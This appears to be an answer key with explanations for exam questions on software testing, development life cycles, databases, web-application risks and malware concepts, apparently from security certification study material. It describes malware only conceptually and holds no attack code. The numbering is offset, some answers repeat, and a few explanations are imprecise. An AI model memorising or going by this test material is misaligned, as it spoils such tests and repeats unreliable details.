c. Dynamic analysis techniques involve the execution of a product and analysis of its response to sets of input data to determine its validity and to detect errors. The behavioral properties of the program are also observed. The most common type of dynamic analysis technique is testing. Testing of software is usually conducted on individual components (for example, subroutines and modules) as they are developed, on software subsystems when they are integrated with one another or with other system components, and on the complete system. Another type of testing is acceptance testing performed before the user accepts the product. Inspections, code reading, and tracing are examples of static analysis. Static analysis is the analysis of requirements, design, code, or other items either manually or automatically, without executing the subject of the analysis to determine its lexical and syntactic properties as opposed to its behavioral properties.

Answer 963

a. Data-flow diagrams are used to describe the data flow through a program in a diagrammatic form. They show how data input is transformed to output, with each stage representing a distinct transformation. The diagrams use three types of components: 1. Annotated bubbles represent transformation centers, and the annotation specifies the transformation. 2. Annotated arrows represent the data flow in and out of the transformation centers; annotations specify what the data is. 3. Operators (AND and OR) link the annotated arrows. Data-flow diagrams describe only data and should not include control or sequencing information. Each bubble can be considered a black box that, as soon as its inputs are available, transforms them to outputs. Each bubble should represent a distinct transformation, whose output is somehow different from its input.

Answer 964

a. The purpose of a finite state machine (FSM) is to define or implement the control structure of a system. Many systems can be defined in terms of their states, inputs, and actions. By defining a system’s actions for each input in every state, you can completely define a system. The resulting model of the system is an FSM, which can detect incomplete or inconsistent requirements specifications.

Answer 965

c. In desk-checking, programming code is read by an expert, other than the author of the code, who performs any of the following: (i) looking over the code for obvious defects, (ii) checking for correct procedure interfaces, (iii) reading the comments to develop a sense of what the code does and then comparing it to its external specifications, (iv) comparing comments to design documentation, (v) stepping through with input conditions contrived to exercise all paths including those not directly related to the external specifications, (vi) checking for compliance with programming standards and conventions, or (vii) any combination of these. As can be seen, desk-checking is a technical exercise performed by programmers.

Answer 966

c. The purpose of mutation analysis is to determine the thoroughness with which a program has been tested and, in the process, detect errors. This procedure involves producing a large set of version or mutation of the original program, each derived by altering a single element of the program (for example, changing an operator, variable, or constant). Each mutant is then tested with a given collection of test data sets. Because each mutant is essentially different from the original, the testing should demonstrate that each is different. If each of the outputs produced by the mutants differs from the output produced by the original program and from each other, then the program is considered adequately tested and correct. Mutation analysis requires good automated tools to be effective.

Answer 967

c. The purpose of error-seeding is to determine whether a set of test cases is adequate. Some known error types are inserted into the program, and the program is executed with the test cases under test conditions. If only some of the seeded errors are found, the test case set is not adequate. One can estimate the number of errors remaining by subtracting the number of real errors found from the total number of real errors. The remaining test effort can then be estimated. If all the seeded errors are found, this indicates that either the test case set is adequate or that the seeded errors were too easy to find.

Answer 968

c. Sensitivity analysis is a new method of quantifying ultra reliable software during the implementation phase. It is based on a fault-failure model of software and is based on the premise that software testability can predict the probability that failure occurs when a fault exists given a particular input distribution. A sensitive location is one in which faults cannot hide during testing. The internal states are disturbed to determine sensitivity. This technique requires instrumentation of the code and produces a count of the total executions through an operation, an infection rate estimate, and a propagation analysis.

Answer 969

c. The purpose of boundary-value analysis is to detect and remove errors occurring at parameter limits or boundaries. The input domain of the program is divided into a number of input classes. The tests should cover the boundaries and extremes of the classes. The tests check that the boundaries of the input domain of the specification coincide with those in the program. Test cases should also be designed to force the output to its extreme values. If possible, a test case that causes output to exceed the specification boundary values should be specified. If output is a sequence of data, special attention should be given to the first and last elements and to lists containing zero, one, and two elements.

Answer 970

a. The purpose of formal methods is to check whether software fulfills its intended function. It involves the use of theoretical and mathematical models to prove the correctness of a program without executing it. The requirements should be written in a formal specification language (for example, VDM and Z) so that these requirements can then be verified using a proof of correctness. Using this method, the program is represented by a theorem and is proved with first-order predicate calculus. A number of assertions are stated at various locations in the program and are used as pre- and post conditions to various paths in the program. The proof consists of showing that the program transfers the pre-conditions into the post conditions according to a set of logical rules, and that the program terminates.

Answer 971

a. The purpose of prototyping is to check the feasibility of implementing a system against the given constraints and to communicate the specifier’s interpretation of the system to the customer to locate misunderstandings. A subset of system functions, constraints, and performance requirements are selected. A prototype is built using high-level tools and is evaluated against the customer’s criteria; the system requirements may be modified as a result of this evaluation. Usually, prototyping is used to define user requirements of the system. A review is a meeting at which the requirements, design, code, or other products of a software development project are presented to the user, sponsor, or other interested parties for comment and approval, often as a prerequisite for concluding a given phase of the software development process. A review is usually held at the end of a phase, but it may be called when problems arise. Simulation is used to test the functions of a software system, together with its interface to the real environment, without modifying the environment in any way. The simulation may be software only or a combination of hardware and software. A walkthrough is an evaluation technique in which a designer or programmer leads one or more other members of the development team through a segment of design or code, whereas the other members ask questions and make comments about technique and style, and identify possible errors, violations of development standards, and other problems. Walkthroughs are similar to reviews but are less formal.

Answer 972

d. The purpose of prototyping is to check the feasibility of implementing a system against the given constraints and to communicate the specifier’s interpretation of the system to the customer to locate misunderstandings. A subset of system functions, constraints, and performance requirements are selected. A prototype is built using high-level tools and is evaluated against the customer’s criteria; the system requirements may be modified as a result of this evaluation. Usually, prototyping is used to define user requirements and design of the system. Simulation or modeling is used to test the functions of a software system, together with its interface to the real environment, without modifying the environment in any way. The simulation may be software only or a combination of hardware and software. A model of the system to be controlled by the actual system under test is created. This model mimics the behavior of the controlled system and is for testing purposes only. Although prototyping and simulation can be used in the system maintenance phase, the payback would be less than the development phase. Usually, the scope of system maintenance can be small and minor, making it cost-prohibitive to the use of prototyping and simulation techniques.

Answer 973

b. Adherence to a common standard ensures the interoperability of software components. Extensive testing is required to ensure that software components can communicate effectively in both single processor and distributed processing environments. In a networked environment, it must be remembered that, when any component is added or replaced/upgraded, a large number of tests have to be run to ensure that the integrity and performance of the network has been retained. Therefore, tests must be repeatable and well documented. Hence, regression tests are necessary. In load testing, many combinations and permutations of workload patterns can be imposed on the components of a networked configuration. Although it would be difficult, if not impossible, to test them all, a thorough analysis of the expected workload is required to identify the most likely traffic patterns for this testing procedure. By their nature, networked systems provide a great number of opportunities for violating system security. This is especially true when security levels are not uniformly imposed throughout a configuration made of multiple, interconnected local-area networks. Systemwide security testing is required to identify any security fault that may have been overlooked in the integrated system design.

Answer 974

c. Resiliency testing measures durability of the system. In functional testing, correctness of system operation under normal operating conditions is demonstrated. In performance testing, system throughput and response times under varying load conditions are demonstrated. In recovery testing, the ability of the system to resume operating after partial or total system failure is determined. Both the system and individual components are tested to determine the ability to operate within the fallback and recovery structure established for the system.

Answer 975

a. Integration testing is the cutoff point for the development project, and, after integration, it is labeled the back end. Integration is the development phase in which various parts and components are integrated to form the entire software product, and, usually after integration, the product is under formal change control. Specifically, after integration testing, every change of the software must have a specific reason and must be documented and tracked. It is too early to have a formal change control mechanism during unit testing because of constant changes to program code. It is too late to have a formal change control mechanism after completing system and acceptance testing.

Answer 976

d. A system development life cycle moves through the unit test, integration test, system test, and acceptance test in that sequence. Programmers perform both the unit test and integration tests, whereas system testing is conducted jointly between users and programmers. End users and production operations staff, from their own viewpoint, perform acceptance testing. The quality of a computer system is enhanced if this sequence is followed during software testing.

Answer 977

c. Activity logs contain a record of all the test cases executed. Incident reports show a priority assigned to test problems during test execution. All incidents logged should be resolved within a reasonable time. Software versioning controls the program source versions to ensure that there is no duplication or confusion between multiple versions. Test cases and test documentation are incorrect because test cases contain a listing of all possible tests to be executed with their associated data and test documentation includes test plans, test objectives, and approaches. Test summaries and test execution reports are incorrect because test summary is a brief description of what is changing. Key words are used so that project personnel reading the log can scan for items that may affect their work. Test execution reports show a status of software testing execution to management with summary information. Test cases rejected and test cases accepted are incorrect because they simply list what test cases were rejected or accepted. The documents such as test cases, test documentation, test summaries, test execution reports, and test cases rejected and accepted do not have the same monitoring and controlling effect as do the documents such as activity logs, incident reports, and software versioning.

Answer 978

a. Integration testing is conducted when software units are integrated with other software units or with system components. Its objective is to test the interfaces among separately tested program units. Software integration tests check how the units interact with other software (for example, libraries) and hardware. Integration testing is in the middle; it is neither unit testing nor system testing. The approach to integration testing varies such as top-down, bottom-up, a combination of top-down and bottom-up (sandwich), or all-at-once (big-bang) approaches. Due to a variety of ways, integration testing can be conducted and because there is no base document such as specifications to rely upon for testing creates difficulty in understanding the objectives of integration testing clearly. Unit testing and module testing are incorrect because they are best understood of all. Unit testing is the same as module testing. Unit/module test cases are derived from the detailed design documentation of the unit. Each unit or module has a defined beginning and ending and deals with specific inputs and outputs. Boundaries are also well defined. System testing is incorrect because it is better understood than integration testing. End users know what they expect from the system because it is based on functional instead of structural knowledge. System test cases are derived from the requirements specification document.

Answer 979

a. Functional decomposition works best when the system requirements are completely understood by the software developer or the end user. The waterfall model works with the functional decomposition principle. It assumes that system requirements can be defined thoroughly, and that end users know exactly what they wanted from the system. Incremental and evolutionary development models are incorrect because successive versions of the system are developed reflecting constrained technology or resources. Requirements are added in a layered manner. Rapid prototyping model is incorrect because it is quite opposite to the waterfall model. That is, it is good when requirements are not fully understood by both parties. Due to the iterative process, the specification-to-customer feedback cycle time is reduced, thus producing early versions of the system.

Answer 980

c. An application software test log has several benefits. Reporting problems for the sake of reporting/compliance to a policy or a procedure is the least beneficial. What is done with the report is more important than just reporting. The other three choices are incorrect because they are the most important benefits. The log shows a record of all problems encountered during testing so events can be traced for verification. The log can also be used as a training tool for new testers because the log shows what happened in the past. Most of all, the log indicates what the tester did or did not do during testing. It forces testers to document the actions or decisions taken place during testing.

Answer 981

a. Stress testing involves the response of the system to extreme conditions (for example, with an exceptionally high workload over a short span of time) to identify vulnerable points within the software and to show that the system can withstand normal workloads. Examples of testing conditions that can be applied during stress testing include the following: (i) if the size of the database plays an important role, then increase it beyond normal conditions, (ii) increase the input changes or demands per time unit beyond normal conditions, (iii) tune influential factors to their maximum or minimal speed, and (iv) for the most extreme cases, put all influential factors to the boundary conditions at the same time. Stress testing can detect design errors related to full-service requirements of system and errors in planning defaults when system is overstressed. Conversion testing is incorrect because it determines whether old data files and record balances are carried forward accurately, completely, and properly to the new system. Performance testing is incorrect because it measures resources required such as memory and disk and determines system response time. Regression testing is incorrect because it verifies that changes do not introduce new errors.

Answer 982

a. Security categorization standards provide a common framework for expressing security needs. Categorization is based on an assessment of the potential impact (i.e., low, moderate, or high) that a loss of confidentiality, integrity, or availability of information systems would have on organizational operations, organizational assets, or individuals. It is a task performed in the initiation phase.

Answer 983

d. Configuration management and control ensures adequate consideration of the potential security impacts due to specific changes to an information system or its surrounding environment. It is a task performed in the operation/maintenance phase.

Answer 984

b. The notion of software component reuse has been developed with the invention of object-oriented development approach. After the design model has been created, the software developer browses a library, or repository, that contains existing program components to determine if any of the components can be used in the design at hand. If reusable components are found, they are used as building blocks to construct a prototype of the software. The waterfall model is incorrect because it takes a linear, sequential view of the software engineering process. The waterfall method is another name for the classic software development life cycle. The prototype model is incorrect because it is a process that enables the developer to create a model of the software built in an evolutionary manner. The spiral model is incorrect because it is another type of evolutionary model. It has been developed to provide the best feature of both the classic life cycle approach and prototyping. None of these three choices provide for software reuse.

Answer 985

d. Continuous monitoring ensures that controls continue to be effective in their application through periodic testing and evaluation. It is a task performed in the operation/maintenance phase.

Answer 986

b. Local threats in Windows XP systems include boot process, unauthorized local access, and privilege escalation. A boot process threat results when an unauthorized individual boots a computer from third-party media (for example, removable drives and universal serial bus [USB] token storage devices), which permits the attacker to circumvent operating system security measures. An unauthorized local-access threat results when an individual who is not permitted to access a computer system gains local access. A privilege escalation threat results when an authorized user with normal user-level rights escalates the account’s privileges to gain administrator-level access. Remote threats in Windows XP systems include network services, data disclosure, and malicious payloads. A network service threat results when remote attackers exploit vulnerable network services on a computer system. This includes gaining unauthorized access to services and data, and causing a denial-of-service (DoS) condition. A data disclosure threat results when a third party intercepts confidential data sent over a network. A malicious payload threat results when malicious payloads (for example, viruses, worms, Trojan horses, and active content) attack computer systems through many vectors. System end users may accidentally trigger malicious payloads.

Answer 987

b. According to the open Web application security project, information from Web requests is not validated before being used by a Web application leading to vulnerability from invalidated input.

Answer 988

a. It is during the system requirements definition phase that the project team identifies the required controls needed for the system. The identified controls are then incorporated into the system during the design phase. When there is a choice between the system requirements definition phase and the design phase, the auditor would benefit most by participating in the former phase. The analyst does not need to participate in the program development or testing phase.

Answer 989

a. A time bomb is a part of a logic bomb. A time bomb is a Trojan horse set to trigger at a particular time, whereas the logic bomb is set to trigger at a particular condition, event, or command. The logic bomb could be a computer program or a code fragment. Computer virus is incorrect because it “reproduces” by making copies of it and inserting them into other programs. Worm is incorrect because it searches the network for idle computing resources and uses them to execute the program in small segments. NAK (negative acknowledgment character) attack is incorrect because it is a penetration technique capitalizing on a potential weakness in an operating system that does not handle asynchronous interrupts properly, thus leaving the system in an unprotected state during such interrupts. NAK uses binary synchronous communications where a transmission control character is sent as a negative response to data received. Here, negative response means data was not received correctly or that a command was incorrect or unacceptable.

Answer 990

b. A Trojan horse fits the description. It is a program that performs a useful function and an unexpected action as well as a form of virus. Trapdoor is incorrect because it is an entry point built into a program created by programmers for debugging purposes. Worm is incorrect because it searches the network for idle computing resources and uses them to execute a program in small segments. Time bomb is incorrect because it is a part of a logic bomb, where a damaging act triggers at some period of time after the bomb is set.

Answer 991

b. Continuous process improvements are expected in the optimizing level of the software capability maturity model. It is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.

Answer 992

d. The purpose of security testing is to assess the robustness of the system’s security capabilities (for example, physical facilities, procedures, hardware, software, and communications) and to identify security vulnerabilities. All the tests listed in the question are part of system acceptance tests where the purpose is to verify that the complete system satisfies specified requirements and is acceptable to end users. Functional test is incorrect because the purpose of functional or black box testing is to verify that the system correctly performs specified functions. Performance test is incorrect because the purpose of performance testing is to assess how well a system meets specified performance requirements. Examples include specified system response times under normal workloads (for example, defined transaction volumes) and specified levels of system availability and mean-times-to-repair. Stress test is incorrect because the purpose of stress testing is to analyze system behavior under increasingly heavy workloads (for example, higher transaction rates), severe operating conditions (for example, higher error rates, lower component availability rates), and, in particular, to identify points of system failure.

Answer 993

a. The application software prototype becoming the finished system is a major risk in prototyping unless this is a conscious decision, as in evolutionary prototyping where a pilot system is built, thrown away, another system is built, and so on. Inflated user expectations is a risk that can be managed with proper education and training. Paying attention to cosmetic details is not bad except that it wastes valuable time. The prototype model is supposed to be iterated many times because that is the best way to define and redefine user requirements and security features until satisfied.

Answer 994

b. Security planning ensures that agreed-upon security controls, whether planned or in place, are fully documented. It is a task performed in the development/acquisition phase.

Answer 995

b. A detailed design occurs after the general design is completed where known tasks are described and identified in a much more detailed fashion and are ready for program design and coding. This includes developing screen/program flows with specifications, input and output file specifications, and report specifications. The other three choices are incorrect because, by definition, they are examples of activities taking place in the general design phase. System requirements are the input to the general design where the system is viewed from top-down and where higher-level design issues are addressed. This includes (i) identifying the purpose and major functions of the system and its subsystems, (ii) defining control, security, and audit requirements, and (iii) developing system justification for the approval of analysis of alternative design choices.

Answer 996

c. Broken authentication means account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other user’s identities.

Answer 997

a. Buffer overflows occur when web application components (for example, common gateway interface, libraries, drivers, and Web application servers) that do not properly validate input can be crashed and, in some cases, used to take control of a process.

Answer 998

a. Web applications frequently use cryptographic functions to protect information and credentials in storage. These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.

Answer 999

b. Security planning ensures that agreed-upon security controls, whether planned or in place, are fully documented. It is a task performed in the development/acquisition phase.

Answer 1000

a. Security categorization standards provide a common framework for expressing security needs. Categorization is based on an assessment of the potential impact (i.e., low, moderate, or high) that a loss of confidentiality, integrity, or availability of information systems would have on organizational operations, organizational assets, or individuals. It is a task performed in the initiation phase.

Answer 1001

d. Configuration management and control ensures adequate consideration of the potential security impacts due to specific changes to an information system or its surrounding environment. It is a task performed in the operation/maintenance phase.

Answer 1002

d. Continuous monitoring ensures that controls continue to be effective in their application through periodic testing and evaluation. It is a task performed in the operation/maintenance phase.

Answer 1003

c. Security certification ensures that the controls are effectively implemented through established verification techniques and procedures and gives an organization confidence that the appropriate safeguards and countermeasures are in place to protect the organization’s information systems. Security accreditation provides the necessary security authorization of an information system to process, store, or transmit information that is required. Both security certification and accreditation tasks are performed in the implementation phase.

Answer 1004

d. Media sanitization ensures that data is deleted, erased, and written over as necessary. It is a task performed in the disposition phase.

Answer 1005

b. During the system development phase, the system is designed, purchased, programmed, developed, or otherwise constructed. During this phase, functional users with system/security administrators develop system controls and audit trails used during the operational phase.

Answer 1006

c. System testing, which is a part of implementation, is important to determine whether internal controls and security controls are operating as designed and are in accordance with established policies and procedures. In the prototyping environment, there is a tendency to compress system initiation, definition, design, programming, and training phases. However, the testing phase should not be compressed so much for quality reasons. By definition, prototyping requires some compression of activities and time due to the speedy nature of the prototyping development methodology without loss of the main features, functions, and quality.

Answer 1007

a. Managers still need to define what they want from the system, some assessment of costs/benefits is still needed, and a plan to proceed with individual responsibilities is still required. The difference may be in the way activities are accomplished. The tools, techniques, methods, and approaches used in the prototype development project and traditional system development project are different.

Answer 1008

D. Unit testing involves testing an individual component in a controlled environment to validate data structure, logic, and boundary conditions. After a programmer develops a component, it is tested with several different input values and in many different situations. Unit testing can start early in development and usually continues throughout the development phase. One of the benefits of unit testing is finding problems early in the development cycle, when it is easier and less expensive to make changes to individual units. A is incorrect because acceptance testing is carried out to ensure that the code meets customer requirements. This testing is for part or all of the application, but not commonly one individual component. B is incorrect because regression testing refers to the retesting of a system after a change has taken place to ensure its functionality, performance, and protection. Essentially, regression testing is done to identify bugs that have caused functionality to stop working as intended as a result of program changes. It is not unusual for developers to fix one problem, only to inadvertently create a new problem, or for the new fix to break a fix to an old problem. Regression testing may include checking previously fixed bugs to make sure they have not re-emerged and rerunning previous tests. C is incorrect because integration testing involves verifying that components work together as outlined in design specifications. After unit testing, the individual components or units are combined and tested together to verify that they meet functional, performance, and reliability requirements.

Answer 1009

C. Databases are commonly used by many different applications simultaneously and many users interacting with them at one time. Concurrency means that different processes (applications and users) are accessing the database at the same time. If this is not controlled properly, the processes can overwrite each other’s data or cause deadlock situations. The negative result of concurrency problems is the reduction of the integrity of the data held within the database. Database integrity is provided by concurrency protection mechanisms. One concurrency control is locking, which prevents users from accessing and modifying data being used by someone else. A is incorrect because concurrency refers to processes running simultaneously, not at different levels. Concurrency issues come up when the database can be accessed at the same time by different users and/or applications. If controls are not in place, two users can access and modify the same data at the same time, which can be detrimental to a dynamic environment. B is incorrect because the ability to deduce new information from reviewing accessible data occurs when a subject at a lower security level indirectly guesses or infers data at ahigher level. This can lead to an inference attack. It is notrelated to concurrency. Concurrency has to do with integrity, while inference is related to confidentiality. D is incorrect because storing data in more than one place is not a problem with concurrency. Concurrency becomes a problem when two subjects or applications are trying to modify the same data at the same time

Answer 1010

A. In an object-oriented database, objects are instantiated when needed, and the data and procedure (called method) go with the object when it is requested. This differs from a relational database, in which the application uses its own procedures to obtain and process data when retrieved from the database. B is incorrect because a mesh network is a physical topology and has nothing to do with databases. A mesh topology is a network of interconnected routers and switches that provides multiple paths to all the nodes on the network. In a full mesh topology, every node is directly connected to every other node, which provides a great degree of redundancy. In a partial mesh topology, every node is not directly connected. The Internet is an example of a partial mesh topology. C is incorrect because subjects accessing a hierarchical database—not an object-oriented database—must have knowledge of the access path in order to access data. In the hierarchical database model, records and fields are related in a logical tree structure. Parents can have one child, many children, or no children. The tree structure contains branches, and each branch has a number of data fields. To access data, the application must know which branch to start with and which route to take through each layer until the data is reached. D is incorrect because the relationships between data entities provide the framework for organizing data in a relational database. A relational database is composed of two dimensional tables, and each table contains unique rows, columns, and cells. Each cell contains one data value that represents a specific attribute within a given row. These data entities are linked by relationships, which provide the framework for organizing the data

Answer 1011

B. Normalization is a process that eliminates redundancy, organizes data efficiently, reduces the potential for anomalies during data operations, and improves data consistency within databases. It is a systematic way of ensuring that a database structure is designed properly to be free of certain undesirable characteristics—insertion, update, and deletion anomalies—that could lead to a loss of data integrity. A is incorrect because polymorphism is when different objects are given the same input and react differently. As a simplistic example of polymorphism, suppose three different objects receive the input “Bob.” Object A would process this input and produce the output “43-year-old white male.” Object B would receive the input “Bob” and produce the output “Husband of Sally.” Object C would produce the output “Member of User group.” Each object received the same input but responded with a different output. C is incorrect because database views are logical access controls and are implemented to permit one group, or a specific user, to see certain information while restricting another group from viewing it altogether. For example, database views can be implemented to allow middle management to see their departments’ profits and expenses without viewing the whole company’s profits. Database views do not minimize duplicate data; rather, they manipulate how data is viewed by specific users/groups. D is incorrect because schema of a database system is its structure described in a formal language. In a relational database, the schema defines the tables, the fields, relationships, views, indexes, procedures, queues, database links, directories, and so on. The schema describes the database and its structure, but not the data that will live within that database itself. This is similar to a blueprint of a house. The blueprint can state that there will be four rooms, six doors, 12 windows, and so on without describing the people who will live in the house.

Answer 1012

c. Each test program involves preparing the executable program, executing it, and deleting it. This saves space on mass storage and generates a complete log. This approach is recommended for debugging and validating purposes. Read, insert, and delete include the transfer of all rows from Table A to Table B in that a table is read, inserted, and deleted. A source program is precompiled, linked, and compiled to become an object or executable program.

Answer 1013

B. Online transaction processing (OLTP) is used when databases are clustered to provide high fault tolerance and performance. It provides mechanisms to watch for and deal with problems when they occur. For example, if a process stops functioning, the monitor mechanisms within OLTP can detect this and attempt to restart the process. If the process cannot be restarted, then the transaction taking place will be rolled back to ensure no data is corrupted or that only part of a transaction happens. OLTP records transactions as they occur (in real time), which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what’s known as the ACID test: * Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. * Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data are consistent in the different databases. * Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. * Durability Once the transaction is verified as accurate on all systems, it is committed, and the databases cannot be rolled back. The term “atomic” means that the units of a transaction will occur together or not at all, thereby ensuring that if one operation fails, the others will not be carried out and corrupt the data in the database. A is incorrect because OLTP and ACID enforce, but do not establish, the integrity rules that are outlined in the database security policy. Representing the letter C in ACID, consistency relates to the enforcement and enforceability of integrity rules. Database software that demonstrates consistency conducts transactions that follow a specific integrity policy and ensure all data are the same in the different databases. C is incorrect because atomicity divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. This means if something does not happen correctly, the database is reverted (rolled back) to its original state. After the transaction happens properly, a rollback cannot take place, which is the durability component of the ACID test. This question is specifically asking about the atomic transaction approach, not durability. D is incorrect because atomic transactions do not address the isolation of processes that are carrying out database transactions; this is the “isolation” component of the ACID test. It is important that a process that is carrying out a transaction cannot be interrupted or modified by another process. This is to ensure the integrity, accuracy, and confidentiality of the data that is being processed during the transaction

Answer 1014

C. Component-based development involves the use of independent and standardized modules. Each standard module consists of a functional algorithm or instruction set and is provided with interfaces to communicate with each other. Component-based development adds reusability and pluggable functionality into programs, and is widely used in modern programming to augment program coherence and substantially reduce software maintenance costs. A common example of these modules is “objects” that are frequently used in object-oriented programming. A is incorrect because the spiral method of system development periodically revisits previous stages to update and verify design requirements. The spiral method builds upon the waterfall method. It uses discrete phases of development with an emphasis on risk analysis, prototypes, and simulations. The spiral method does not specify the development and testing of components. B is incorrect because structured programming development involves the use of logical blocks to achieve system design using procedural programming. A structured program layout minimizes the use of arbitrary transfer control statements like GOTO and emphasizes on single points of entry and exit. This hierarchical approach makes it easier for the program to be understood and modified later on. D is incorrect because extreme programming is a methodology that is generally implemented in scenarios requiring rapid adaptations to changing client requirements. Extreme programming emphasizes client feedback to evaluate project outcomes and to analyze project domains that may require further attention. The coding principle of extreme programming throws out the traditional long-term planning carried out for code reuse and instead focuses on creating simple code optimized for the contemporary assignment

Answer 1015

A. A tunneling virus—not a polymorphic virus—attempts to install itself under an antivirus program. When the antivirus conducts its health check on critical files, file sizes, modification dates, etc., it makes a request to the operating system to gather this information. If the virus can put itself between the antivirus and the operating system, then when the antivirus sends out a system call for this type of information, the tunneling virus can intercept the call and respond with information that indicates the system is free of virus infections. The polymorphic virus also attempts to fool antivirus scanners, but it does so by producing varied but operational copies of itself. Even if antivirus software finds and disables one or two copies, other copies may still remain active within the system. B is incorrect because a polymorphic virus can vary the sequence of its instructions by including noise, or bogus instructions, with other useful instructions. It can also use a mutation engine and a random-number generator to change the sequence of its instructions in the hopes of not being detected. The original functionality stays the same, but the code changes, making it close to impossible to identify all versions of the virus using a fixed signature. C is incorrect because a polymorphic virus can use different encryption schemes requiring different decryption routines. This requires an antivirus scan for several scan strings, one for each possible decryption method, in order to identify all copies of this type of virus. Polymorphic virus writers most commonly hide a virus’s payload with encryption and add a decryption method to the code. Once it is encrypted, the code is meaningless. However, a virus that is encrypted is not necessarily a polymorphic virus. To be polymorphic, the virus’s encryption and decryption algorithms must mutate with each new version of itself. D is incorrect because a polymorphic virus produces multiple, varied copies of itself in an effort to avoid detection by antivirus software. A polymorphic virus has the capability to change its own code, enabling the virus to have hundreds or thousands of variants. These activities can cause the virus scanner to not properly recognize the virus and to leave it to do its damage.

Answer 1016

B. Java is an object-oriented, platform-independent programming language. It is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. Java is platform independent because it creates intermediate code, bytecode, which is not processor-specific. The Java Virtual Machine (JVM) then converts the bytecode into machine-level code that the processor on the particular system can understand. A is incorrect because the Java Virtual Machine converts the bytecode into machine-level code. It does not convert the source code into bytecode—a Java compiler does that. The JVM also creates a virtual machine within an environment called a sandbox. This virtual machine is an enclosed environment in which the applet carries out its activities. Applets are commonly sent over HTTP within a requested web page, which means the applet executes as soon as it arrives. It can carry out malicious activity on purpose or accidentally if the developer of the applet did not do his part correctly. So the sandbox strictly limits the applet’s access to any system resources. The JVM mediates access to system resources to ensure the applet code behaves and stays within its own sandbox. C is incorrect because Java is an object-oriented, platform independent programming language. Other languages are compiled to object code for a specific operating system and processor. This is why a particular application may run on Windows but not on Macintosh. An Intel processor does not necessarily understand machine code compiled for an Alpha processor, and vice versa. Java is platform-independent because it creates intermediate code—bytecode—which is not processor-specific. D is incorrect because the Java Virtual Machine does not write applets. Java is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. A programmer creates a Java applet and runs it through a compiler. The Java compiler converts the source code into bytecode. The user then downloads the Java applet. The bytecode is converted into machine-level code by the JVM. Finally, the applet runs when called upon.

Answer 1017

B. A Trojan horse looks like an innocent and helpful program, but in the background it is carrying out some type of malicious activity unknown to the user. The Trojan horse could be corrupting files, sending the user’s password to an attacker, or attacking another computer.

Answer 1018

A. The trick to this question, and any one like it, is that security should be implemented at the first possible phase of a project. Requirements are gathered and developed at the beginning of a project, which is project initiation. The other answers are steps that follow this phase, and security should be integrated right from the beginning instead of in the middle or at the end.

Answer 1019

A. The whole purpose of an expert system is to look at the data it has to work with and what the user presents to it and to come up with new or different solutions. It basically performs data-mining activities, identifies patterns and relationships the user can’t see, and provides solutions. This is the same reason you would go to a human expert. You would give her your information, and she would combine it with the information she knows and give you a solution or advice, which is not necessarily the same data you gave her.

Answer 1020

D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

Answer 1021

C. This can seem like a tricky question. It is asking you if the system detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

Answer 1022

B. The following outlines the common phases of the software development life cycle: 1. Project initiation 2. Functional design analysis and planning 3. System design specifications 4. Software development 5. Testing 6. Installation/implementation 7. Operational/maintenance 8. Disposal

Answer 1023

B. Garbage collection is an automated way for software to carry out part of its memory management tasks. A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks. It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

Answer 1024

A. The software development models and their definitions are as follows: * Joint Analysis Development (JAD) A method that uses a team approach in application development in a workshop-oriented environment. * Rapid Application Development (RAD) A method of determining user requirements and developing systems quickly to satisfy immediate needs. * Reuse Model A model that approaches software development by using progressively developed models. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the Reuse model does not require programs to be built from scratch, it drastically reduces both development cost and time. * Cleanroom An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

Answer 1025

C. Fuzz testing or fuzzing is a software testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

Answer 1026

A. The five levels of the Capability Maturity Integration Model are: * Initial Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. * Repeatable A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined. * Defined Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement. * Managed The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process improvement program. * Optimizing The company has budgeted and integrated plans for continuous process improvement.

Answer 1027

B. The characteristics and their associated definitions are listed as follows: * Modularity Autonomous objects, cooperation through exchanges of messages. * Deferred commitment The internal components of an object can be redefined without changing other parts of the system. * Reusability Other programs using the same objects. * Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.

Answer 1028

B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

Answer 1029

B. Knowledge discovery in databases (KDD) is a field of study that works with metadata and attempts to put standards and conventions in place on the way that data are analyzed and interpreted. KDD is used to identify patterns and relationships between data. It is also called data mining.

Answer 1030

